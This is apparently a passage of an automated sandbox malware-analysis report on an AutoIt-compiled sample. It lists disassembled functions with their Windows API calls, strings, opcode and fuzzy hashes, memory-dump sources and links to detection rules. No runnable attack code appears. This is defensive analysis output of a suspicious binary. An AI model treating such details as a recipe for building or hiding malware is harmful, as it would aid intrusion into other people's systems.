                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                            Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: u,D
                                                            • API String ID: 4104443479-3858472334
                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                            Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • wsprintfW.USER32 ref: 0045612A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_mallocwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1262938277-328681919
                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                            Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                            • InternetCloseHandle.WININET ref: 00442668
                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                            • String ID: aeB
                                                            • API String ID: 857135153-906807131
                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                            Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                            Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                            Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D